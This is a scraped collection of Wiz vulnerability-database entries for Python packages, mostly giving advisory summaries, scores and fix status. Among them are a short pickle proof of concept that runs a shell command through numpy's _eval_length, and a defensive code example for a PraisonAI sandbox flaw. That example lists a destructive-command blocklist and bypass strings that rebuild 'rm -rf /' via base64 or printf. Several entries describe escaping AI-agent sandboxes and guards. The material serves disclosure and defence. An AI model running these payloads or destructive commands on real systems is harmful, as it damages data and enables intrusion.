CVE-2025-67895 [CRITICAL] CVE-2025-67895 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67895 : Python vulnerability analysis and mitigation
Edge3 Worker RPC RCE on Airflow 2.
This issue affects Apache Airflow Providers Edge3: before 2.0.0 - and only if you installed and configured it on Airflow 2.
The Edge3 provider support in Airflow 2 has been always development-only and not officially released, however if you installed and configured Edge3 provider in Airflow 2, it implicitly enabled non-public (normally) API which was used to test Edge Provider in Airflow 2 during the development. This API allowed Dag author to perform Remote Code Execution in the webserver context, which Dag Author was not supposed to be able to do.
If you installed and configured Edge3 provider for Airflow 2, you should uninstall it and migrate to Airflow 3. The new Edge3 provider vers
Wiz
blogs_wiz·CVSS 5.3
CVE-2026-22701 [MEDIUM] CVE-2026-22701 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-22701 : Python vulnerability analysis and mitigation
filelock is a platform-independent file lock for Python. Prior to version 3.20.3, a TOCTOU race condition vulnerability exists in the SoftFileLock implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the _acquire() method between raise_on_not_writable_file() (permission check) and os.open() (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. This issue ha
Wiz
blogs_wiz·CVSS 7.5
CVE-2026-28356 [HIGH] CVE-2026-28356 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28356 : Python vulnerability analysis and mitigation
multipart is a fast multipart/form-data parser for python. Prior to 1.2.2, 1.3.1 and 1.4.0-dev, the parse_options_header() function in multipart.py uses a regular expression with an ambiguous alternation, which can cause exponential backtracking (ReDoS) when parsing maliciously crafted HTTP or multipart segment headers. This can be abused for denial of service (DoS) attacks against web applications using this library to parse request headers or multipart/form-data streams. The issue is fixed in 1.2.2, 1.3.1 and 1.4.0-dev.
Source : NVD
## 7.5
Score
Published March 12, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Chainguard
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
blogs_wiz
GHSA-5cxw-w2xg-2m8h Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-5cxw-w2xg-2m8h : Python vulnerability analysis and mitigation
## Our assessment
Identifiers quoted in the assessment: `platform`, `file`, `platform._follow_symlinks`. Code fragment quoted in the assessment:
```python
target = _follow_symlinks(target)
# "file" output is locale dependent: force the usage of the C locale
# to get deterministic behavior.
env = dict(os.environ, LC_ALL='C')
try:
    # -b: do not prepend filenames to output lines (brief mode)
    output = subprocess.check_output(['file', '-b', target],
                                     stderr=subprocess.DEVNULL,
                                     env=env)
```
## Original report
## Summary
Identifiers quoted in the report: `platform._syscmd_file`, `platform.architecture`, `platform.libc_ver`, `check_safety()`, `Severity.LIKELY_SAFE`, `fickling.loads()`, `subprocess.check_output`, `['file', '-b', target]`, `shell=True`, `file`.
## Affected versions
<= 0.1.9
## Non-duplication check against published Fickling GHSAs
Identifiers quoted in the report: `platform`.
Wiz
blogs_wiz·CVSS 6.9
CVE-2026-28804 [MEDIUM] CVE-2026-28804 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28804 : Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Prior to version 6.7.5, an attacker who uses this vulnerability can craft a PDF which leads to long runtimes. This requires accessing a stream which uses the /ASCIIHexDecode filter. This issue has been patched in version 6.7.5.
Source : NVD
## 6.9
Score
Published March 6, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
Python
Chainguard
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python313-PyPDF2
litellm
Sources
NVD
Chainguard Has Fix Added at: Mar 08, 2026
Debian 11, 12
Wiz
blogs_wiz·CVSS 2.1
CVE-2026-2970 [LOW] CVE-2026-2970 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2970 : Python vulnerability analysis and mitigation
A vulnerability has been found in datapizza-labs datapizza-ai 0.0.2. Affected by this vulnerability is the function RedisCache of the file datapizza-ai-cache/redis/datapizza/cache/redis/cache.py. Such manipulation leads to deserialization. The attack requires being on the local network. A high complexity level is associated with this attack. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
Source : NVD
## 2.1
Score
Published February 23, 2026
Severity LOW
CNA Score 2.1
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
blogs_wiz·CVSS 7.3
CVE-2025-67644 [HIGH] CVE-2025-67644 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67644 : Python vulnerability analysis and mitigation
LangGraph SQLite Checkpoint is an implementation of LangGraph CheckpointSaver that uses SQLite DB (both sync and async, via aiosqlite). Versions 3.0.0 and below are vulnerable to SQL injection through the checkpoint implementation. Checkpoint allows attackers to manipulate SQL queries through metadata filter keys, affecting applications that accept untrusted metadata filter keys (not just filter values) in checkpoint search operations. The _metadata_predicate() function constructs SQL queries by interpolating filter keys directly into f-strings without validation. This issue is fixed in version 3.0.1.
Source : NVD
## 7.8
Score
Published December 11, 2025
Severity HIGH
CNA Score 7.3
Affected Technologies
Python
Wiz
blogs_wiz·CVSS 4.6
CVE-2026-33699 [MEDIUM] CVE-2026-33699 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33699 : Python vulnerability analysis and mitigation
pypdf is a free and open-source pure-python PDF library. Versions prior to 6.9.2 have a vulnerability in which an attacker can craft a PDF which leads to an infinite loop. This requires reading a file in non-strict mode. This has been fixed in pypdf 6.9.2. If users cannot upgrade yet, consider applying the changes from the patch manually.
Source : NVD
## 4.6
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 4.6
Affected Technologies
Python
Wolfi
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pypdf
pypdf2
Sources
NVD
Chainguard Has Fix
Wiz
blogs_wiz·CVSS 9.8
CVE-2026-25481 [CRITICAL] CVE-2026-25481 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25481 : Python vulnerability analysis and mitigation
Langroid is a framework for building large-language-model-powered applications. Prior to version 0.59.32, there is a bypass to the fix for CVE-2025-46724. TableChatAgent can call pandas_eval tool to evaluate the expression. There is a WAF in langroid/utils/pandas_utils.py introduced to block code injection CVE-2025-46724. However it can be bypassed due to _literal_ok() returning False instead of raising UnsafeCommandError on invalid input, combined with unrestricted access to dangerous dunder attributes ( init , globals , builtins ). This allows chaining whitelisted DataFrame methods to leak the eval builtin and execute arbitrary code. This issue has been patched in version 0.59.32.
Source : NVD
## 9.4
Score
Wiz
blogs_wiz·CVSS 5.3
CVE-2025-14692 [MEDIUM] CVE-2025-14692 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14692 : Python vulnerability analysis and mitigation
A flaw has been found in Mayan EDMS up to 4.10.1. The impacted element is an unknown function of the file /authentication/. This manipulation causes open redirect. It is possible to initiate the attack remotely. The exploit has been published and may be used. Upgrading to version 4.10.2 is sufficient to resolve this issue. The affected component should be upgraded. The vendor confirms that this is "[f]ixed in version 4.10.2". Furthermore, that "[b]ackports for older versions in process and will be out as soon as their respective CI pipelines complete."
Source : NVD
## 5.3
Score
Published December 15, 2025
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
blogs_wiz·CVSS 5.5
CVE-2026-29780 [MEDIUM] CVE-2026-29780 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29780 : Python vulnerability analysis and mitigation
eml_parser serves as a python module for parsing eml files and returning various information found in the e-mail as well as computed information. Prior to version 2.0.1, the official example script examples/recursively_extract_attachments.py contains a path traversal vulnerability that allows arbitrary file write outside the intended output directory. Attachment filenames extracted from parsed emails are directly used to construct output file paths without any sanitization, allowing an attacker-controlled filename to escape the target directory. This issue has been patched in version 2.0.1.
Source : NVD
## 5.5
Score
Published March 7, 2026
Severity MEDIUM
CNA Score 5.5
Affected Technologies
Python
Wiz
blogs_wiz·CVSS 8.6
CVE-2026-24486 [HIGH] CVE-2026-24486 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-24486 : Python vulnerability analysis and mitigation
Identifiers quoted in the advisory: `UPLOAD_DIR`, `UPLOAD_KEEP_FILENAME=True`.
Source : NVD
## 7.5
Score
Published January 27, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Python
Wolfi
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
airflow-3
open-webui
Sources
NVD
Alpine 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Feb 18, 2026
Chainguard Has Fix Added at: Jan 28, 2026
Debian 11, 12 Severity MEDIUM No Fix Added at: Jan 27, 2026
Debian 13, 14 Severity HIGH Has Fix Added at: Jan 27, 2026
Echo Severity HIGH Has Fix
Wiz
blogs_wiz·CVSS 5.3
CVE-2026-21892 [MEDIUM] CVE-2026-21892 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21892 : Python vulnerability analysis and mitigation
Parsl is a Python parallel scripting library. A SQL Injection vulnerability exists in the parsl-visualize component of versions prior to 2026.01.05. The application constructs SQL queries using unsafe string formatting (Python % operator) with user-supplied input (workflow_id) directly from URL routes. This allows an unauthenticated attacker with access to the visualization dashboard to inject arbitrary SQL commands, potentially leading to data exfiltration or denial of service against the monitoring database. Version 2026.01.05 fixes the issue.
Source : NVD
## 7.3
Score
Published January 8, 2026
Severity HIGH
CNA Score 5.3
Affected Technologies
Python
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
blogs_wiz·CVSS 8.1
CVE-2025-68472 [HIGH] CVE-2025-68472 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68472 : Python vulnerability analysis and mitigation
MindsDB is a platform for building artificial intelligence from enterprise data. Prior to version 25.11.1, an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. The PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and source_type is not "url". Only multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to clear_filename or equivalent checks. This vulnerability is fixed in 25.11.1.
Source : NVD
## 9.1
Score
Published January 12, 2026
Severity CRITICAL
CNA Score 8.1
Affected Technologies
Wiz
blogs_wiz·CVSS 7.5
CVE-2025-68616 [HIGH] CVE-2025-68616 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68616 : Python vulnerability analysis and mitigation
Identifiers quoted in the advisory: `default_url_fetcher`, `localhost`, `url_fetcher`, `urllib`.
Source : NVD
## 7.5
Score
Published January 19, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
Homebrew
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 18.9
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
python3-tinycss2
python3-weasyprint
Sources
NVD
Alpine 3.14, 3.15, 3.16, 3.17, 3.18, 3.19, 3.20, 3.21, 3.22, 3.23, edge Severity HIGH No Fix Added at: Feb 19, 2026
pip Severity HIGH Has Fix Added at: Jan 21, 2026
Homebrew Severity HIGH Has Fix Added at: Feb 20, 2026
Wiz
blogs_wiz·CVSS 5.9
CVE-2026-32632 [MEDIUM] CVE-2026-32632 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32632 : Python vulnerability analysis and mitigation
Identifiers quoted in the advisory: `Host`, `TrustedHostMiddleware`.
Source : NVD
## 5.9
Score
Published March 18, 2026
Severity MEDIUM
CNA Score 5.9
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
glances
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 19, 2026
Debian 14 Severity MEDIUM Has Fix Added at: Mar 19, 2026
Echo Severity MEDIUM No Fix Added at: Mar 19, 2026
pip Severity MEDIUM Has Fix Added at: Mar 17, 2026
Homebrew Severity MEDIUM Has Fix Added at: Mar 20, 2026
Nix Severity MEDIUM Has Fix Added at: Mar 20, 2026
Wiz
blogs_wiz·CVSS 4.9
CVE-2025-68463 [MEDIUM] CVE-2025-68463 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68463 : Python vulnerability analysis and mitigation
Bio.Entrez in Biopython through 1.86 allows doctype XXE.
Source : NVD
## 4.9
Score
Published December 18, 2025
Severity MEDIUM
CNA Score 4.9
Affected Technologies
Python
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
python-biopython
python3-biopython
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Dec 21, 2025
Echo Severity MEDIUM No Fix Added at: Dec 21, 2025
pip Severity MEDIUM No Fix Added at: Dec 21, 2025
Wiz
blogs_wiz·CVSS 4.5
CVE-2025-69277 [MEDIUM] CVE-2025-69277 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-69277 : Python vulnerability analysis and mitigation
libsodium before ad3004e, in atypical use cases involving certain custom cryptography or untrusted data to crypto_core_ed25519_is_valid_point, mishandles checks for whether an elliptic curve point is valid because it sometimes allows points that aren't in the main cryptographic group.
Source : NVD
## 4.5
Score
Published December 31, 2025
Severity MEDIUM
CNA Score 4.5
Affected Technologies
Python
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pynacl
datadog-agent-7.71
Sources
NVD
Alpine 3.20, 3.21, 3.22, 3.23, edge Severity MEDIUM Has Fix
Wiz
blogs_wiz·CVSS 9.2
[CRITICAL] GHSA-6556-fwc2-fg2p Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-6556-fwc2-fg2p : Python vulnerability analysis and mitigation
## Summary
Identifiers quoted in the advisory: `numpy.f2py.crackfortran._eval_length`.
## Details
Identifiers quoted in the advisory: `numpy.f2py.crackfortran._eval_length`, `__reduce__`.
## PoC
```python
class PoC:
    def __reduce__(self):
        from numpy.f2py.crackfortran import _eval_length
        return _eval_length, ("__import__('os').system('whoami')", None)
```
## Impact
Arbitrary code execution on the victim machine once they load the “scanned as safe” pickle / model file.
Affects any workflow relying on Picklescan to vet untrusted pickle / PyTorch artifacts.
Enables supply‑chain poisoning of shared model files.
## Credits
ac0d3r
Tong Liu , Institute of information engineering, CAS
Source : NVD
## 6.7
Score
Published December 30, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Wiz
blogs_wiz·CVSS 9.8
CVE-2026-3059 [CRITICAL] CVE-2026-3059 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3059 : Python vulnerability analysis and mitigation
SGLang's multimodal generation module is vulnerable to unauthenticated remote code execution through the ZMQ broker, which deserializes untrusted data using pickle.loads() without authentication.
Source : NVD
## 9.8
Score
Published March 12, 2026
Severity CRITICAL
CNA Score 9.8
Affected Technologies
Python
SGLang
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 78.5
Exploitation Probability (EPSS) 1.2
Affected packages and libraries
sglang
cpe:2.3:a:lmsys:sglang
Sources
pip Severity CRITICAL No Fix Added at: Mar 12, 2026
Linux Severity CRITICAL No Fix Added at: Apr 02, 2026
Windows Severity CRITICAL No Fix
Wiz
blogs_wiz·CVSS 6.8
CVE-2026-23968 [MEDIUM] CVE-2026-23968 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23968 : Python vulnerability analysis and mitigation
Identifiers quoted in the advisory: `--UNSAFE,--trust`, `_preserve_symlinks: false`.
Source : NVD
## 6.8
Score
Published January 21, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Python
NixOS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
copier
Sources
NVD
pip Severity MEDIUM Has Fix Added at: Jan 22, 2026
Homebrew Severity MEDIUM Has Fix Added at: Feb 04, 2026
Nix Severity MEDIUM Has Fix Added at: Feb 04, 2026
Wiz
blogs_wiz·CVSS 8.1
CVE-2026-33010 [HIGH] CVE-2026-33010 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33010 : Python vulnerability analysis and mitigation
mcp-memory-service is an open-source memory backend for multi-agent systems. Prior to version 10.25.1, when the HTTP server is enabled (MCP_HTTP_ENABLED=true), the application configures FastAPI's CORSMiddleware with allow_origins=["*"], allow_credentials=True, allow_methods=["*"], and allow_headers=["*"]. The wildcard Access-Control-Allow-Origin: * header permits any website to read API responses cross-origin. When combined with anonymous access (MCP_ALLOW_ANONYMOUS_ACCESS=true) - the simplest way to get the HTTP dashboard working without OAuth - no credentials are needed, so any malicious website can silently read, modify, and delete all stored memories. This issue has been patched in version 10.25.1.
Source : NVD
Wiz
blogs_wiz·CVSS 7.7
CVE-2026-34222 [HIGH] CVE-2026-34222 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34222 : Python vulnerability analysis and mitigation
Open WebUI is a self-hosted artificial intelligence platform designed to operate entirely offline. Prior to version 0.8.11, there is a broken access control vulnerability in tool values. This issue has been patched in version 0.8.11.
Source : NVD
## 7.7
Score
Published April 1, 2026
Severity HIGH
CNA Score 7.7
Affected Technologies
Python
Open WebUI
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
open-webui
cpe:2.3:a:openwebui:open_webui
Sources
NVD
pip Severity HIGH Has Fix Added at: Apr 02, 2026
Linux Severity HIGH Has Fix Added at: Apr 02
Wiz
blogs_wiz·CVSS 5.8
CVE-2026-25905 [MEDIUM] CVE-2026-25905 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25905 : Python vulnerability analysis and mitigation
The Python code being run by 'runPython' or 'runPythonAsync' is not isolated from the rest of the JS code, allowing any Python code to use the Pyodide APIs to modify the JS environment. This may result in an attacker hijacking the MCP server - for malicious purposes including MCP tool shadowing. Note - the "mcp-run-python" project is archived and unlikely to receive a fix.
Source : NVD
## 5.8
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 5.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mcp-run-python
Wiz
blogs_wiz·CVSS 6.1
CVE-2026-28222 [MEDIUM] CVE-2026-28222 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28222 : Python vulnerability analysis and mitigation
Wagtail is an open source content management system built on Django. Prior to versions 6.3.8, 7.0.6, 7.2.3, and 7.3.1, a stored cross-site scripting (XSS) vulnerability exists on rendering TableBlock blocks within a StreamField. A user with access to create or edit pages containing TableBlock StreamField blocks is able to set specially-crafted class attributes on the block which run arbitrary JavaScript code when the page is viewed. When viewed by a user with higher privileges, this could lead to performing actions with that user's credentials. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin, and only affects sites using TableBlock. This issue has been patched in versions
Wiz
blogs_wiz·CVSS 4.8
CVE-2025-15504 [MEDIUM] CVE-2025-15504 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-15504 : Python vulnerability analysis and mitigation
A security flaw has been discovered in lief-project LIEF up to 0.17.1. Affected by this issue is the function Parser::parse_binary of the file src/ELF/Parser.tcc of the component ELF Binary Parser. The manipulation results in null pointer dereference. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. Upgrading to version 0.17.2 can resolve this issue. The patch is identified as 81bd5d7ea0c390563f1c4c017c9019d154802978. It is recommended to upgrade the affected component.
Source : NVD
## 4.8
Score
Published January 10, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Python
Rust
Has Public Exploit Yes
Has CISA KEV Exploit No
Wiz
blogs_wiz·CVSS 9.6
CVE-2026-0596 [CRITICAL] CVE-2026-0596 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0596 : Python vulnerability analysis and mitigation
Identifiers quoted in the advisory: `enable_mlserver=True`, `model_uri`, `bash -c`, `$()`.
Source : NVD
## 9.6
Score
Published March 31, 2026
Severity CRITICAL
CNA Score 9.6
Affected Technologies
Python
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 57.6
Exploitation Probability (EPSS) 0.4
Affected packages and libraries
mlflow
Sources
NVD
pip Severity CRITICAL Has Fix Added at: Apr 05, 2026
Wiz
blogs_wiz·CVSS 2.0
CVE-2026-29790 [LOW] CVE-2026-29790 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29790 : Python vulnerability analysis and mitigation
dbt-common is the shared common utilities for dbt-core and adapter implementations use. Prior to versions 1.34.2 and 1.37.3, a path traversal vulnerability exists in dbt-common's safe_extract() function used when extracting tarball archives. The function uses os.path.commonprefix() to validate that extracted files remain within the intended destination directory. However, commonprefix() compares paths character-by-character rather than by path components, allowing a malicious tarball to write files to sibling directories with matching name prefixes. This issue has been patched in versions 1.34.2 and 1.37.3.
Source : NVD
## 2
Score
Published March 6, 2026
Severity LOW
CNA Score 2.0
Affected Technologies
Python
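The dbt-common entry above describes the same defect class as the PraisonAI advisory, with a subtler check: `os.path.commonprefix()` compares characters, so a destination of `/opt/dbt/target` accepts a member that resolves to `/opt/dbt/target-evil/...`. The following added example is not dbt-common's `safe_extract()`; it puts the flawed string-prefix test beside the component-wise `commonpath` test on a constructed member name. The destination paths are hypothetical.

```python
# Added example (not dbt-common's code): string-prefix vs component-wise containment.
import posixpath


def _target(dest, member):
    # Where the archive member would land; dest must be absolute and normalized.
    return posixpath.normpath(posixpath.join(dest, member))


def within_commonprefix(dest, member):
    """The flawed check: compares characters, so '/opt/dbt/target-evil' passes."""
    return posixpath.commonprefix([dest, _target(dest, member)]) == dest


def within_commonpath(dest, member):
    """The fixed check: compares whole path components."""
    return posixpath.commonpath([dest, _target(dest, member)]) == dest


def compare(dest, member):
    """(flawed verdict, fixed verdict) for one archive member name."""
    return within_commonprefix(dest, member), within_commonpath(dest, member)


if __name__ == "__main__":
    for name in ("models/a.sql", "../target-evil/hook.sql", "../../etc/passwd"):
        print(name, compare("/opt/dbt/target", name))
```

`commonprefix` only catches members that leave the destination's parent as well; a sibling whose name shares the prefix passes. `commonpath` is the standard-library fix, and either test still needs `dest` normalized (no trailing slash) before use.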
Wiz
blogs_wiz·CVSS 7.5
CVE-2026-30922 [HIGH] CVE-2026-30922 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30922 : Python vulnerability analysis and mitigation
Identifiers quoted in the advisory: `pyasn1`, `SEQUENCE`, `0x30`, `SET`, `0x31`, `0x80`, `RecursionError`, `MAX_OID_ARC_CONTINUATION_OCTETS`.
Source : NVD
## 7.5
Score
Published March 18, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
CBL Mariner
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
metaflow-service-fips
spamcheck
Sources
NVD
CBL-Mariner 2.0 Severity HIGH Has Fix Added at: Apr 02, 2026
Chainguard Has Fix Added at: Mar 18, 2026
Debian 11 Severity HIGH No Fix Added at: Mar 19, 2026
Debian 12, 13, 14 Severity HIGH Has Fix Added at: Mar 19, 2026
Echo Severity HIGH
Wiz
blogs_wiz·CVSS 9.8
CVE-2026-35616 [CRITICAL] The CVE Database: Curated Vulnerability Intelligence by Wiz | Wiz
## Wiz Vulnerability Database
A comprehensive resource for monitoring high-profile vulnerabilities in cloud environments, tailored for security teams and cloud professionals
## High Profile
| CVE ID | Severity | Score | Technologies | Component name | CISA KEV exploit | Has fix | Published date |
|---|---|---|---|---|---|---|---|
| CVE-2026-35616 | CRITICAL | 9.8 | FortiClient EMS | cpe:2.3:a:fortinet:forticlient_enterprise_management_server | Yes | Yes | Apr 04, 2026 |
| GHSA-69fq-xp46-6x23 | CRITICAL | 9.4 | N/A | github.com/aquasecurity/trivy | No | Yes | Mar 24, 2026 |
| CVE-2026-3055 | CRITICAL | 9.3 | Citrix ADC VPX | cpe:2.3:a:citrix:netscaler_application_delivery_controller | Yes | Yes | Mar 23, 2026 |
Wiz
blogs_wiz·CVSS 8.8
CVE-2026-34955 [HIGH] CVE-2026-34955 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34955 : Python vulnerability analysis and mitigation
PraisonAI is a multi-agent teams system. Prior to version 4.5.97, SubprocessSandbox in all modes (BASIC, STRICT, NETWORK_ISOLATED) calls subprocess.run() with shell=True and relies solely on string-pattern matching to block dangerous commands. The blocklist does not include sh or bash as standalone executables, allowing trivial sandbox escape in STRICT mode via sh -c ' '. This issue has been patched in version 4.5.97.
Source : NVD
## 8.8
Score
Published April 4, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
Python
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.4
Exploitation Probability (EPSS) N/A
Affected p
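The failure mode behind CVE-2026-34955, shown as an added example written for this page (it is not PraisonAI's `SubprocessSandbox` code): a substring blocklist over the raw command string is put next to commands that sail through it, and beside it a runner that never hands a string to a shell. The blocklist patterns, the allowlist of programs and the sample commands are all constructed for the illustration.

```python
import os
import shlex
import subprocess

# Constructed, representative string-pattern blocklist of the kind the advisory
# describes; the real PraisonAI list is not reproduced here.
BLOCKED_PATTERNS = ("rm -rf", "mkfs", "dd if=", ":(){", "> /dev/sd")


def blocklist_allows(command: str) -> bool:
    """The weak check: substring matching on the raw command string."""
    return not any(pattern in command for pattern in BLOCKED_PATTERNS)


# Inputs a blocklist cannot see through: the interpreter itself is not blocked and
# the payload never contains the literal pattern (quoting, encoding, indirection).
BYPASS_COMMANDS = (
    "sh -c 'r\"\"m -rf /'",                          # empty quotes split the pattern
    "bash -c \"$(printf 'rm -r\\x66 /')\"",          # pattern assembled at runtime
    "sh -c \"$(echo cm0gLXJmIC8= | base64 -d)\"",    # base64 of 'rm -rf /'
)

# Hardened variant: tokenize with shlex, allowlist argv[0] by bare name, and run
# with shell=False so $(...), |, ; and > are plain characters, not operators.
ALLOWED_PROGRAMS = frozenset({"echo", "ls", "cat", "wc", "sort", "head"})


def parse_allowlisted(command: str) -> list:
    argv = shlex.split(command)
    if not argv:
        raise ValueError("empty command")
    if "/" in argv[0]:
        raise ValueError("paths are not accepted; name a program on the allowlist")
    if argv[0] not in ALLOWED_PROGRAMS:
        raise ValueError(f"program not allowlisted: {argv[0]!r}")
    return argv


def run_allowlisted(command: str, timeout: float = 5.0) -> str:
    argv = parse_allowlisted(command)
    result = subprocess.run(argv, shell=False, capture_output=True, text=True,
                            timeout=timeout, check=False)
    return result.stdout


def audit() -> dict:
    """Which bypasses the blocklist accepts, and which the allowlist rejects."""
    accepted = [c for c in BYPASS_COMMANDS if blocklist_allows(c)]
    rejected = []
    for c in BYPASS_COMMANDS:
        try:
            parse_allowlisted(c)
        except ValueError:
            rejected.append(c)
    return {"blocklist_accepts": accepted, "allowlist_rejects": rejected}


if __name__ == "__main__":
    print(audit())
    # With shell=False the argument reaches echo literally: no command substitution.
    print(run_allowlisted("echo $(id)"))
```

The allowlist deliberately refuses `argv[0]` values containing a slash: once a caller can name a path, `../../tmp/echo` is a different binary with an allowlisted basename. Note that `shell=False` removes shell metacharacter handling but not argument injection into the allowlisted program itself, so a program like `find` or `awk` that can execute things should not be on the list.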
Wiz
CVE-2025-62349 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.5
CVE-2025-62349 [HIGH] CVE-2025-62349 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62349 :
Python vulnerability analysis and mitigation
Salt contains an authentication protocol version downgrade weakness that can allow a malicious minion to bypass newer authentication/security features by using an older request payload format, enabling minion impersonation and circumventing protections introduced in response to prior issues.
Source : NVD
## 7.5
Score
Published January 30, 2026
Severity HIGH
CNA Score 7.5
Affected Technologies
Python
SaltStack
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 8.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
salt-cloud
salt-proxy
Sources
NVD
Alpine 3.22 Severity MEDIUM Has Fix Added at: Nov 26,
Wiz
CVE-2026-35002 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.3
